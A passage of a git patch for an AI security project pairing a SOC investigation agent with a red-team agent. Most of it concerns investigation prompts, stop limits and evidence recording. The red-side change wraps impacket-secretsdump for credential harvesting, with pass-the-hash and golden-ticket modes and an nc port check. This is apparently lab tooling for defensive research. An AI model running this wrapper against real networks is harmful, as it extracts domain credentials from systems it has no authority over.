+ for e in events + if isinstance(e, ToolEnd) + and hasattr(e, "tool_call") + and e.tool_call + and ("query_loki" in e.tool_call.name or "query_prometheus" in e.tool_call.name) + ) + if query_count >= max_queries: + logger.critical( + f"🛑 STOP CONDITION: Max queries ({max_queries}) reached. Forcing stop." + ) + return True + return False + + return StopCondition(stop, name="stop_on_max_queries") + + +def max_tool_calls_stop(max_calls: int = 20) -> StopCondition: + """Stop condition that fires after max_calls TOTAL tool calls without completion. + + This is a safety net to prevent infinite loops when the agent keeps calling + non-query tools (record_evidence, get_combined_questions, etc.) 
without + ever calling complete_investigation. + """ + from collections.abc import Sequence + + def stop(events: Sequence[AgentEvent]) -> bool: + tool_count = sum( + 1 for e in events if isinstance(e, ToolEnd) and hasattr(e, "tool_call") and e.tool_call + ) + if tool_count >= max_calls: + logger.critical( + f"🛑 STOP CONDITION: Max tool calls ({max_calls}) reached without completion. " + "Agent must call complete_investigation() or escalate_investigation()." + ) + return True + return False + + return StopCondition(stop, name="stop_on_max_tool_calls") + + def create_investigation_agent( model: str, grafana_url: str, @@ -87,7 +367,7 @@ def create_investigation_agent( mitre_client: MITREAttackClient, state: InvestigationState, grafana_mcp_tools: list | None = None, - max_steps: int = 150, + max_steps: int = 30, ) -> Agent: """ Create a configured investigation agent. @@ -104,6 +384,9 @@ def create_investigation_agent( Returns: Configured agent ready to investigate """ + # Set state for query recording + set_investigation_state(state) + grafana_tools = GrafanaTools( base_url=grafana_url, api_key=grafana_api_key, @@ -111,6 +394,7 @@ def create_investigation_agent( investigation_tools = InvestigationTools() investigation_tools.set_state(state) + investigation_tools.set_mitre_client(mitre_client) question_tools = QuestionEngineTools() question_tools.set_engines(mitre_client, state) @@ -137,10 +421,12 @@ def create_investigation_agent( escalate_investigation, ] - # Add Grafana MCP tools if available + # Add Grafana MCP tools if available - with rate limiting on query tools if grafana_mcp_tools: logger.info(f"Adding {len(grafana_mcp_tools)} Grafana MCP tools to agent") - tools.extend(grafana_mcp_tools) + # Wrap query tools with rate limiting to prevent infinite query loops + wrapped_tools = wrap_mcp_query_tools(grafana_mcp_tools) + tools.extend(wrapped_tools) else: logger.warning( "No Grafana MCP tools available - agent will have limited query capabilities" @@ -160,6 +446,8 
@@ def create_investigation_agent( stop_conditions=[ tool_use("complete_investigation"), tool_use("escalate_investigation"), + max_queries_stop(max_queries=5), # Force stop after 5 queries + max_tool_calls_stop(max_calls=20), # Force stop after 20 total tool calls ], thread=Thread(), # type: ignore[call-arg] ) diff --git a/src/ares/core/factories/red_factory.py b/src/ares/core/factories/red_factory.py index 483bb3ae..4c2b525c 100644 --- a/src/ares/core/factories/red_factory.py +++ b/src/ares/core/factories/red_factory.py @@ -1,5 +1,7 @@ """Factory for creating red team agents with presets.""" +import time + import dreadnode as dn from dreadnode.agent import Agent from dreadnode.agent.events import ( @@ -36,37 +38,95 @@ "redteam/agents/system_instructions.md.jinja" ) +# Event deduplication state +_last_event_times: dict[str, float] = {} +_last_step_number: int | None = None +_DEBOUNCE_WINDOW = 0.1 # 100ms debounce window + + +def reset_event_tracking(): + """Reset event tracking state for a new agent run.""" + global _last_event_times, _last_step_number + _last_event_times = {} + _last_step_number = None + + +def _should_log_event(event_type: str) -> bool: + """Check if event should be logged (debounce rapid duplicates).""" + now = time.time() + last_time = _last_event_times.get(event_type, 0) + if now - last_time < _DEBOUNCE_WINDOW: + return False + _last_event_times[event_type] = now + return True + async def log_step_start(event: StepStart): - """Log step start for debugging.""" - logger.info(f"📍 Step started: step_number={getattr(event, 'step_number', '?')}") + """Log step start for debugging - only when step number is meaningful.""" + global _last_step_number + step_num = getattr(event, "step_number", None) + + # Skip if no real step number or if it's the same as last logged step + if step_num is None or step_num == _last_step_number: + return + + if not _should_log_event("step_start"): + return + + _last_step_number = step_num + logger.info(f"📍 Step {step_num} 
started") async def log_generation_end(event: GenerationEnd): - """Log generation end with details.""" - logger.info("📍 Generation ended") - # Log the message if available - if hasattr(event, "message") and event.message: - msg = event.message - logger.info(f"📍 Message type: {type(msg).__name__}") - if hasattr(msg, "content"): - logger.info(f"📍 Message content (first 500 chars): {str(msg.content)[:500]}") - if hasattr(msg, "tool_calls") and msg.tool_calls: - logger.info(f"📍 Tool calls requested: {[tc.name for tc in msg.tool_calls]}") + """Log generation end - only when there's meaningful content.""" + # Skip empty/spurious generation events + if not hasattr(event, "message") or not event.message: + return + + msg = event.message + has_content = hasattr(msg, "content") and msg.content and str(msg.content).strip() + has_tool_calls = hasattr(msg, "tool_calls") and msg.tool_calls + + # Only log if there's actual content or tool calls + if not has_content and not has_tool_calls: + return + + if not _should_log_event("generation_end"): + return + + # Log concise summary + if has_tool_calls: + tool_names = [tc.name for tc in msg.tool_calls] + logger.info(f"🤖 Agent requesting tools: {tool_names}") + elif has_content: + content_preview = str(msg.content)[:200].replace("\n", " ") + logger.info(f"🤖 Agent: {content_preview}...") async def log_agent_error(event: AgentError): - """Log agent errors.""" + """Log agent errors - only real errors, not spurious SDK events.""" error = getattr(event, "error", None) + # Only log if there's an actual error (SDK emits AgentError with None frequently) + if error is None: + return # Silently ignore spurious events + logger.error(f"🚨 Agent error: {error}") - if hasattr(event, "traceback"): + if hasattr(event, "traceback") and event.traceback: logger.error(f"🚨 Traceback: {event.traceback}") async def log_agent_end(event: AgentEnd): - """Log agent end.""" + """Log agent end - only when there's a meaningful stop reason.""" stop_reason = 
getattr(event, "stop_reason", None) - logger.info(f"📍 Agent ended: stop_reason={stop_reason}") + + # Skip spurious end events with no stop reason + if stop_reason is None: + return + + if not _should_log_event("agent_end"): + return + + logger.info(f"🏁 Agent ended: {stop_reason}") async def log_tool_usage(event: ToolStart): @@ -151,6 +211,9 @@ def create_redteam_agent( Returns: Configured agent ready for penetration testing operations """ + # Reset event tracking for fresh agent run + reset_event_tracking() + # Initialize toolsets network_tools = NetworkEnumerationTools() network_tools.set_state(state) diff --git a/src/ares/tools/blue/actions.py b/src/ares/tools/blue/actions.py index b45e5b7c..fc8baa68 100644 --- a/src/ares/tools/blue/actions.py +++ b/src/ares/tools/blue/actions.py @@ -26,92 +26,146 @@ def set_state(self, state: InvestigationState): async def complete_investigation( self, summary: str, - attack_synopsis: str, - recommendations: list[str], - confidence: str, - affected_hosts: list[str], - affected_users: list[str], - attack_timeframe: str, + attack_synopsis: str | None = None, + recommendations: list[str] | None = None, ) -> str: """Complete the investigation and signal report generation. - REQUIRED before calling: - 1. Must have transitioned through lateral stage - 2. Must have investigated at least one host - 3. Must provide specific affected hosts/users - 4. Must provide attack timeframe + Call this when you have: + - Answered the key questions about the alert + - Recorded evidence for your findings + - Built a timeline of events + - Identified affected hosts/users Args: - summary: Executive summary (2-3 sentences). - attack_synopsis: Detailed description of the attack chain. - recommendations: List of recommended actions. - confidence: Overall confidence level (high/medium/low with explanation). - affected_hosts: List of hosts involved in the attack (IPs or hostnames). - affected_users: List of user accounts involved. 
- attack_timeframe: Time range of the attack (e.g., "2024-01-15 14:30-15:45 UTC"). + summary: Executive summary of the investigation including: + - What attack/activity was detected + - Key findings and evidence + - Affected hosts and users + - Confidence level (high/medium/low) + attack_synopsis: Narrative describing the attack chain chronologically. + Should include specific hostnames, usernames, IPs, and timestamps. + Explains how the attacker progressed through the attack. + recommendations: List of recommended actions to take. Should include + both immediate response actions and long-term improvements. + Check the alert's 'response' annotation for expert guidance. Returns: - Confirmation message or error if validation fails. + Confirmation message. Example: >>> await complete_investigation( - ... summary="Detected Kerberoasting attack targeting service accounts.", - ... attack_synopsis="Attacker performed AS-REP roasting against samwell.tarly...", - ... recommendations=["Reset passwords for samwell.tarly and jeor.mormont"], - ... confidence="High - Multiple corroborating Kerberos events", - ... affected_hosts=["10.0.4.186", "WINTERFELL.north.sevenkingdoms.local"], - ... affected_users=["samwell.tarly", "jeor.mormont"], - ... attack_timeframe="2024-01-08 04:37-04:43 UTC" + ... summary="Detected Kerberoasting attack targeting service accounts. " + ... "User samwell.tarly requested TGS tickets with RC4 encryption " + ... "for multiple SPNs from host 10.0.4.186. Confidence: High.", + ... attack_synopsis="At 14:30 UTC, user samwell.tarly from 10.0.4.186 " + ... "began requesting TGS tickets for service accounts. " + ... "12 tickets requested with RC4 encryption over 5 minutes.", + ... recommendations=[ + ... "Reset service account passwords immediately", + ... "Enable AES-only Kerberos encryption", + ... "Review service account permissions" + ... ] ... ) 'Investigation completed. Report will be generated.' 
""" - warnings = [] - # Validate state exists if not self.state: return "ERROR: No investigation state. Cannot complete." - # Log stage warning but don't block + # Log stage info if self.state.stage.value not in ["lateral", "synthesis"]: - warnings.append( - f"Note: Investigation completed at '{self.state.stage.value}' stage " - f"(ideally should reach 'lateral' stage for thorough analysis)." - ) - - # Log if no hosts were investigated - if not self.state.queried_hosts and not affected_hosts: - warnings.append( - "Note: No specific hosts were investigated. Consider investigating " - "affected hosts in future investigations." - ) - - # Log warnings (but don't block completion) - for warning in warnings: - logger.warning(warning) - - # All validations passed + logger.info(f"Investigation completed at '{self.state.stage.value}' stage") + + # Store attack synopsis if provided + if attack_synopsis: + self.state.attack_synopsis = attack_synopsis + logger.info(f"Attack synopsis recorded: {attack_synopsis[:100]}...") + + # Process recommendations + if recommendations: + self.state.recommendations.extend(recommendations) + logger.info(f"Added {len(recommendations)} recommendations") + + # Auto-extract recommendations from alert annotations if none provided + if not self.state.recommendations: + alert_annotations = self.state.alert.get("annotations", {}) + response_guidance = alert_annotations.get("response", "") + if response_guidance: + # Parse numbered or bulleted steps from response + import re + + steps = re.split(r"\d+\.\s+", response_guidance) + extracted_recs = [s.strip() for s in steps if s.strip()] + if extracted_recs: + self.state.recommendations.extend(extracted_recs) + logger.info(f"Auto-extracted {len(extracted_recs)} recommendations from alert") + + # Auto-generate synopsis if not provided and we have evidence + if not self.state.attack_synopsis and self.state.evidence: + self._generate_fallback_synopsis() + + # Record completion 
dn.log_metric("investigation_completed", 1) dn.log_output( "completion_summary", { "summary": summary, - "attack_synopsis": attack_synopsis, - "recommendations": recommendations, - "confidence": confidence, - "affected_hosts": affected_hosts, - "affected_users": affected_users, - "attack_timeframe": attack_timeframe, + "attack_synopsis": self.state.attack_synopsis, + "recommendations": self.state.recommendations, "evidence_count": len(self.state.evidence), "timeline_events": len(self.state.timeline), "hosts_investigated": list(self.state.queried_hosts), "users_investigated": list(self.state.queried_users), + "techniques_identified": list(self.state.identified_techniques), }, ) - logger.success("Investigation completed") + logger.success(f"Investigation completed: {summary[:100]}...") return "Investigation completed. Report will be generated." + def _generate_fallback_synopsis(self) -> None: + """Generate a basic synopsis from evidence if none provided.""" + if not self.state: + return + + parts = [] + + # Get alert info + alert_name = self.state.alert.get("labels", {}).get("alertname", "Unknown alert") + severity = self.state.alert.get("labels", {}).get("severity", "unknown") + starts_at = self.state.alert.get("startsAt", "") + + parts.append(f"{severity.upper()} alert: {alert_name}") + + if starts_at: + parts.append(f"Alert triggered at {starts_at}.") + + # Add technique info + if self.state.identified_techniques: + techniques = ", ".join(list(self.state.identified_techniques)[:3]) + parts.append(f"MITRE techniques identified: {techniques}.") + + # Add host/user info + if self.state.queried_hosts: + hosts = ", ".join(list(self.state.queried_hosts)[:3]) + parts.append(f"Hosts involved: {hosts}.") + + if self.state.queried_users: + users = ", ".join(list(self.state.queried_users)[:3]) + parts.append(f"Users involved: {users}.") + + # Add evidence summary + if self.state.evidence: + parts.append(f"{len(self.state.evidence)} evidence items collected.") + # Get 
highest-level evidence + high_level = [e for e in self.state.evidence if e.pyramid_level.value >= 5] + if high_level: + parts.append(f"{len(high_level)} high-value indicators (tools/TTPs) identified.") + + self.state.attack_synopsis = " ".join(parts) + @dn.tool() # type: ignore[untyped-decorator] async def escalate_investigation( diff --git a/src/ares/tools/blue/investigation.py b/src/ares/tools/blue/investigation.py index 187ed394..3dd7f841 100644 --- a/src/ares/tools/blue/investigation.py +++ b/src/ares/tools/blue/investigation.py @@ -32,14 +32,20 @@ class InvestigationTools(Toolset): # type: ignore[misc] Attributes: state: Current investigation state being managed. + mitre_client: MITRE ATT&CK client for technique lookups. """ state: InvestigationState | None = None + mitre_client: MITREAttackClient | None = None def set_state(self, state: InvestigationState): """Set the investigation state (called by orchestrator).""" self.state = state + def set_mitre_client(self, client: MITREAttackClient): + """Set the MITRE client for technique lookups.""" + self.mitre_client = client + @dn.tool_method # type: ignore[untyped-decorator] def record_evidence( self, @@ -116,6 +122,8 @@ def record_evidence( if mitre_techniques: self.state.identified_techniques.update(mitre_techniques) + # Look up technique names and tactics + self._resolve_technique_metadata(mitre_techniques) dn.log_output(f"evidence_{evidence_id}", ev.to_dict()) dn.log_metric("evidence_count", 1, mode="count") @@ -127,6 +135,24 @@ def record_evidence( return evidence_id + def _resolve_technique_metadata(self, technique_ids: list[str]) -> None: + """Look up and cache technique names and tactics.""" + if not self.state or not self.mitre_client: + return + + for tech_id in technique_ids: + # Skip if already resolved + if tech_id in self.state.technique_names: + continue + + technique = self.mitre_client.get_technique(tech_id) + if technique: + self.state.technique_names[tech_id] = technique.name + 
self.state.technique_to_tactic[tech_id] = technique.tactic or "Unknown" + if technique.tactic: + self.state.identified_tactics.add(technique.tactic) + logger.debug(f"Resolved technique {tech_id}: {technique.name} ({technique.tactic})") + @dn.tool_method # type: ignore[untyped-decorator] def add_timeline_event( self, diff --git a/src/ares/tools/red/network.py b/src/ares/tools/red/network.py index 4773c0be..a81c8f4a 100644 --- a/src/ares/tools/red/network.py +++ b/src/ares/tools/red/network.py @@ -193,6 +193,27 @@ def set_state(self, state: RedTeamState) -> None: """Set the operation state for this toolset.""" self.state = state + def _check_smb_connectivity(self, target: str, timeout_seconds: int = 5) -> tuple[bool, str]: + """Check if SMB port 445 is reachable on target. + + Args: + target: Target IP address + timeout_seconds: Connection timeout for nc command + + Returns: + Tuple of (is_reachable, error_message) + """ + cmd = ["nc", "-zv", "-w", str(timeout_seconds), target, "445"] + try: + # AWS SSM has a minimum timeout of 30 seconds + ssm_timeout = max(30, timeout_seconds + 5) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=ssm_timeout) + if returncode == 0: + return True, "" + return False, f"SMB port 445 not reachable: {stderr or stdout}" + except Exception as e: + return False, f"Connectivity check failed: {e}" + @dn.tool_method def secretsdump( self, @@ -201,8 +222,11 @@ def secretsdump( password: str | None = None, hash: str | None = None, domain: str | None = None, + dc_ip: str | None = None, no_pass: bool = False, - timeout_minutes: int = 10, + timeout_minutes: int = 3, + connection_timeout: int = 30, + skip_connectivity_check: bool = False, ) -> str: """ Extract secrets using impacket-secretsdump for credential harvesting. 
@@ -217,18 +241,32 @@ def secretsdump( password: Password for the username (optional) hash: NTLM hash for pass-the-hash authentication (optional) domain: Domain name (optional, can be inferred) + dc_ip: Domain controller IP address (recommended for DC targets to avoid DNS issues) no_pass: If True, use Kerberos golden ticket authentication - timeout_minutes: Maximum time to spend dumping (default: 10) + timeout_minutes: Maximum time to spend dumping (default: 3) + connection_timeout: Timeout for initial SMB connection in seconds (default: 30) + skip_connectivity_check: Skip the SMB port check (default: False) Returns: Extracted credentials including NTLM hashes, Kerberos keys, and secrets Example: >>> secretsdump("192.168.1.100", "Administrator", password="P@ssw0rd") # pragma: allowlist secret - >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN") + >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN", dc_ip="192.168.1.100") >>> secretsdump("domain.local", "Administrator", no_pass=True) # golden ticket """ - cmd = ["impacket-secretsdump"] + # Pre-check SMB connectivity to fail fast + if not skip_connectivity_check: + is_reachable, error_msg = self._check_smb_connectivity(target) + if not is_reachable: + return f"[!] Target {target} is not reachable on SMB port 445. {error_msg}" + + # Use timeout command to enforce connection-level timeout + cmd = ["timeout", str(connection_timeout), "impacket-secretsdump"] + + # Add dc-ip flag if provided (helps avoid DNS resolution hangs) + if dc_ip: + cmd.extend(["-dc-ip", dc_ip]) if password and domain: target_string = f"{domain}/{username}:{password}@{target}" @@ -257,6 +295,10 @@ def secretsdump( stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=timeout_minutes * 60) + # Check for timeout exit code (124 from timeout command) + if returncode == 124: + return f"[!] Secretsdump timed out after {connection_timeout}s connecting to {target}. 
Target may be unreachable or credentials invalid." + logger.info(f"[*] Secretsdump completed for {target}") return stdout or stderr or f"Secretsdump returned code {returncode}" diff --git a/templates/agent/initial_alert_prompt.md.jinja b/templates/agent/initial_alert_prompt.md.jinja index 6c23cb89..3293af07 100644 --- a/templates/agent/initial_alert_prompt.md.jinja +++ b/templates/agent/initial_alert_prompt.md.jinja @@ -104,11 +104,25 @@ mcp__grafana__query_loki_logs( If no results, try broader queries but ALWAYS use the time range above. **CRITICAL**: After EVERY query (whether it returns results or not), you MUST: -1. If results found: Call record_evidence() for EACH user/host/IP/process/finding +1. If results found: **PARSE THE JSON** and call record_evidence() for EACH user/host/IP/process found 2. If NO results: Document this and either try a broader query OR move forward with get_combined_questions() 3. DO NOT query multiple times without calling record_evidence() or get_combined_questions() -**YOU ARE STUCK IN A LOOP IF**: You make 3+ queries without calling record_evidence() or get_combined_questions() +**YOU ARE STUCK IN A LOOP IF**: You make 2+ queries without calling record_evidence() + +## How to Parse Query Results + +Loki returns JSON like this: +```json +{"line": "{\"computer\":\"winterfell.north.sevenkingdoms.local\", \"event_data\":\"<Data Name='TargetUserName'>robb.stark</Data><Data Name='IpAddress'>10.0.4.186</Data>\"}"} +``` + +**EXTRACT AND RECORD:** +- `computer` field → record_evidence(evidence_type="hostname", value="winterfell...") +- `TargetUserName` from event_data → record_evidence(evidence_type="user", value="robb.stark") +- `IpAddress` from event_data → record_evidence(evidence_type="ip", value="10.0.4.186") + +**DO NOT** re-run the same query. **DO** parse results and extract IOCs. --- @@ -161,12 +175,10 @@ If no results, try broader queries but ALWAYS use the time range above. 18. ☐ Call transition_stage("synthesis") ### Stage 4: SYNTHESIS -19. 
☐ Call complete_investigation() with ALL required fields - -**DO NOT complete the investigation until you have:** -- Identified specific affected hosts (including ALL domain controllers) -- Identified ALL compromised user accounts -- Investigated precursor techniques (enumeration, credential access) -- Created a complete timeline from initial access to detected attack -- Recorded at least 5 evidence items covering the full attack chain -- Mapped the attack to multiple MITRE techniques (not just the alert technique) +19. ☐ Call complete_investigation(summary="...") with a summary of your findings + +**Complete the investigation when you have:** +- Investigated the alert and recorded evidence +- Identified affected hosts and users +- Built a timeline of events +- Can provide recommendations diff --git a/templates/agent/system_instructions.md.jinja b/templates/agent/system_instructions.md.jinja index 8f073c9a..044d99a4 100644 --- a/templates/agent/system_instructions.md.jinja +++ b/templates/agent/system_instructions.md.jinja @@ -1,6 +1,22 @@ You are Ares, an autonomous SOC investigation agent. Your mission is to investigate -security alerts and produce actionable threat intelligence through systematic, -question-driven investigation. +security alerts and produce actionable threat intelligence. + +## 🛑 CRITICAL: COMPLETE QUICKLY + +**You have LIMITED steps. Do NOT loop endlessly on queries.** + +1. Query logs (2-3 queries max) +2. Record any findings with record_evidence() +3. Call complete_investigation(summary="...") with your findings + +If queries return empty results, that IS a finding. Complete with: +``` +complete_investigation(summary="Investigated [alert]. No matching events found in logs. +Recommend continued monitoring. 
Confidence: Low - no data to confirm or deny.") +``` + +**ANTI-PATTERN**: Making 3+ queries without calling complete_investigation() +**CORRECT PATTERN**: Query → Record findings → Complete ## Core Investigation Philosophy @@ -95,16 +111,51 @@ The alert's `startsAt` timestamp is likely STALE. The initial prompt provides: **DO NOT skip this stage. If you only detect the final attack without precursors, your investigation is INCOMPLETE.** -### Stage 3: LATERAL (What is the SCOPE?) +### Stage 3: LATERAL (What is the SCOPE?) - CRITICAL FOR HIGH/CRITICAL ALERTS + +For HIGH and CRITICAL severity alerts, you MUST perform lateral investigation. + 1. Call get_combined_questions() for scope questions -2. Use track_host_investigation() and track_user_investigation() -3. Check these dimensions in PARALLEL: +2. Use track_host_investigation() and track_user_investigation() for EACH entity +3. **MANDATORY LATERAL QUERIES:** + +**For each user discovered:** +``` +{job=~".+"} |~ "(?i)<username>" +``` +- What other hosts did this user access? +- What other activities did this user perform? +- Were there failed login attempts before success? + +**For each host discovered:** +``` +{job=~".+"} |~ "(?i)<hostname>" +``` +- What other users logged into this host? +- What processes were executed on this host? +- What network connections were made? + +**For each IP discovered:** +``` +{job=~".+"} |~ "<ip_address>" +``` +- What other hosts communicated with this IP? +- What services were accessed from this IP? +- Is this IP associated with multiple users? + +4. Check these dimensions in PARALLEL: - Same host: What else is this host doing? - Same user: Where else has this user been? - Same indicators: Where else do these IOCs appear? - Same timeframe: What else happened during this window? -4. Expand or contract scope based on findings -5. Call transition_stage("synthesis") + +5. 
**Build a scope map:** + - List ALL compromised/affected hosts + - List ALL compromised/affected users + - Identify the attack origin point + - Identify the furthest point of lateral movement + +6. Call transition_stage("synthesis") ### Stage 4: SYNTHESIS (Generate report) 1. Call get_investigation_summary() to review findings @@ -246,7 +297,28 @@ data sources. These tools include: - Check stats before running large queries - Prefer MCP tools when available as they're more reliable than HTTP API calls -## Evidence Recording +## Evidence Recording (CRITICAL - DO NOT SKIP) + +**You MUST extract and record ALL IOCs from query results.** For EVERY finding, call record_evidence(). + +### IOC Extraction Checklist + +When you get query results, extract and record EACH of these: + +| IOC Type | What to Look For | Pyramid Level | +|----------|------------------|---------------| +| **ip** | Source IPs, destination IPs, client IPs | 2 | +| **user** | Usernames, account names, service accounts | 4 | +| **hostname** | Computer names, server names, DC names | 4 | +| **domain** | Domain names, FQDNs | 3 | +| **process** | Process names, command lines | 4 | +| **file** | File paths, file names | 4 | +| **hash** | MD5, SHA1, SHA256 hashes | 1 | +| **artifact** | Registry keys, scheduled tasks, services | 4 | +| **tool** | Attack tools (mimikatz, rubeus, etc.) | 5 | +| **technique** | MITRE ATT&CK technique ID | 6 | + +### record_evidence() Parameters For EVERY finding, call record_evidence() with: 1. evidence_type: ip, domain, hash, process, user, file, artifact, tool, technique @@ -256,14 +328,202 @@ For EVERY finding, call record_evidence() with: 5. pyramid_level: 1-6 (6 = TTP, the goal!) 6. 
mitre_techniques: List of technique IDs if known +### Example: Extracting IOCs from DCSync Detection + +If you find a DCSync event, record MULTIPLE evidence items: + +```python +# Record the technique (level 6 - TTP) +record_evidence( + evidence_type="technique", + value="T1003.006 - DCSync", + source="Loki query: Event 4662", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=6, + mitre_techniques=["T1003.006"] +) + +# Record the attacking user (level 4) +record_evidence( + evidence_type="user", + value="robb.stark", + source="Event 4662 SubjectUserName field", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=4, + mitre_techniques=["T1003.006"] +) + +# Record the source host (level 4) +record_evidence( + evidence_type="hostname", + value="winterfell.north.sevenkingdoms.local", + source="Event 4662 SubjectLogonId correlated with 4624", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=4, + mitre_techniques=["T1003.006"] +) + +# Record the source IP (level 2) +record_evidence( + evidence_type="ip", + value="10.0.4.186", + source="Event 4624 IpAddress field", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=2, + mitre_techniques=["T1003.006"] +) +``` + +**DO NOT just record the technique - record ALL associated IOCs!** + +## Parsing Loki Query Results (CRITICAL) + +Loki returns structured JSON with embedded Windows Event data. You MUST parse these results. 
+ +### Loki Response Structure + +Each result contains: +```json +{ + "timestamp": "...", + "line": "{\"computer\":\"hostname\", \"event_id\":4624, \"event_data\":\"...\"}", + "labels": {"host": "...", "deployment": "..."} +} +``` + +### Extracting IOCs from Results + +**Step 1: Parse the `line` field as JSON** +The `line` field contains the actual log entry with: +- `computer`: The hostname (e.g., "winterfell.north.sevenkingdoms.local") +- `event_id`: Windows Event ID +- `event_data`: XML containing user/IP/SID data +- `message`: Human-readable event description + +**Step 2: Extract from `event_data` XML** +Look for these XML patterns: +- `<Data Name='TargetUserName'>username</Data>` → Record as user +- `<Data Name='SubjectUserName'>username</Data>` → Record as user +- `<Data Name='IpAddress'>10.0.4.186</Data>` → Record as IP +- `<Data Name='WorkstationName'>hostname</Data>` → Record as hostname +- `<Data Name='TargetDomainName'>DOMAIN</Data>` → Record as domain +- `<Data Name='ProcessName'>C:\path\exe</Data>` → Record as process + +**Step 3: Extract from `labels`** +- `host`: Source hostname +- `computer`: Full FQDN +- `deployment`: Environment identifier + +### Example: Parsing a 4624 Logon Event + +If query returns: +``` +computer: winterfell.north.sevenkingdoms.local +event_data: <Data Name='TargetUserName'>robb.stark</Data> + <Data Name='IpAddress'>10.0.4.186</Data> +``` + +You MUST call: +```python +record_evidence(evidence_type="hostname", value="winterfell.north.sevenkingdoms.local", ...) +record_evidence(evidence_type="user", value="robb.stark", ...) +record_evidence(evidence_type="ip", value="10.0.4.186", ...) 
+``` + +### Common Windows Event Fields by Event ID + +| Event ID | Key Fields to Extract | +|----------|----------------------| +| 4624 (Logon) | TargetUserName, IpAddress, WorkstationName, LogonType | +| 4625 (Failed Logon) | TargetUserName, IpAddress, FailureReason | +| 4662 (Object Access) | SubjectUserName, ObjectName, AccessMask | +| 4728/4732 (Group Add) | MemberName, TargetUserName (group), SubjectUserName | +| 4768 (TGT Request) | TargetUserName, IpAddress, ServiceName | +| 4769 (TGS Request) | TargetUserName, ServiceName, IpAddress, TicketEncryptionType | + +**ANTI-PATTERN**: Getting query results and immediately querying again without extracting IOCs +**CORRECT PATTERN**: Get results → Parse JSON → Extract each IOC → record_evidence() for each → Then query again if needed + ## Completion Criteria -Call complete_investigation() when: -1. get_combined_questions() returns no high-priority questions -2. You have TTPs identified (pyramid level 6) -3. Tactical coverage is reasonable (checked major attack phases) -4. Timeline is coherent -5. Scope is understood +Call complete_investigation(summary, attack_synopsis, recommendations) when: +1. You have investigated the alert and recorded evidence +2. You understand what happened (attack type, affected hosts/users) +3. You can provide recommendations + +### Summary Requirements + +The **summary** should include: +- What attack/activity was detected +- Key findings and affected hosts/users +- Confidence level + +### Attack Synopsis Requirements (CRITICAL) + +The **attack_synopsis** is a narrative describing the attack chain. It should: +- Describe the attack from start to finish in chronological order +- Include specific hostnames, usernames, IPs, and timestamps +- Explain how the attacker progressed (what they did first, second, etc.) 
+- Connect the dots between evidence pieces + +**Good Synopsis Example:** +``` +"On 2026-01-10 at 14:30 UTC, attacker from IP 10.0.4.186 began password spraying +against domain accounts. After 47 failed attempts, they successfully authenticated +as arya.stark at 14:45. Using these credentials, they accessed SYSVOL share on +DC01 at 14:52 to harvest GPP passwords. At 15:10, they executed DCSync from +workstation WS-042, extracting the krbtgt hash. Total time from initial access +to domain compromise: 40 minutes." +``` + +**Bad Synopsis Example:** +``` +"DCSync attack detected." (Too vague, no details) +``` + +### Recommendations Requirements (CRITICAL) + +The **recommendations** list should include: +1. **Extract from alert annotations**: The alert's `response` annotation contains expert-written response steps - USE THEM +2. **Add investigation-specific findings**: Based on what you discovered +3. **Prioritize by severity**: Critical actions first + +**Always check the alert annotations for:** +- `response`: Contains step-by-step remediation guidance +- `summary`: Contains concise attack description +- `description`: Contains detailed attack explanation + +Example with all three parameters: +``` +complete_investigation( + summary="Detected DCSync attack. User robb.stark executed replication requests " + "from winterfell.north.sevenkingdoms.local. NTLM hashes exfiltrated for " + "multiple domain accounts. Confidence: High based on Event 4662 correlation.", + attack_synopsis="Initial access occurred via password spray at 14:30 UTC with " + "47 failed logons against 12 accounts. Successful authentication " + "as robb.stark at 14:45. SYSVOL accessed at 14:52. 
DCSync executed " + "at 15:10 targeting krbtgt and Administrator accounts.", + recommendations=[ + "IMMEDIATE: Reset krbtgt password twice (10 hours apart)", + "IMMEDIATE: Reset all compromised account passwords", + "Isolate source host winterfell.north.sevenkingdoms.local", + "Block source IP at network perimeter", + "Hunt for golden ticket usage (Event 4769 with RC4)", + "Review all privileged account access in past 24 hours" + ] +) +``` + +### Timeline Building (MANDATORY) + +You MUST call add_timeline_event() for EVERY significant event discovered: +- Authentication events (successful and failed) +- Share access events +- Privilege escalation events +- Lateral movement events +- Data exfiltration indicators + +**Even if you only have the alert timestamp**, create a timeline event for it. Call escalate_investigation() if: - Active, ongoing attack detected From 9a6cbf13e10bc2995b9aaff972de2732cea6d3b1 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Sat, 10 Jan 2026 17:49:50 -0700 Subject: [PATCH 4/5] feat: add red-blue correlation engine, investigation learning tools, and query resilience **Added:** - Introduced a Red-Blue Correlation Engine for mapping red team activities to blue team detections, generating coverage metrics and detailed markdown reports (`src/ares/core/correlation.py`) - Implemented a persistence layer for storing investigation results, tracking query effectiveness, and similarity-based lookup for new alerts (`src/ares/core/persistence.py`) - Added query resilience module to provide automatic retry, time range reduction, and chunking for large queries to Loki/Prometheus backends (`src/ares/core/query_resilience.py`) - Added `LearningTools` agent toolset to expose past investigation data, effective queries, false positive patterns, and statistics to the agent (`src/ares/tools/blue/learning.py`) - Introduced workflow for generating and updating coverage badge in CI (`.github/workflows/coverage-badge.yaml`) - Added static badge for code coverage 
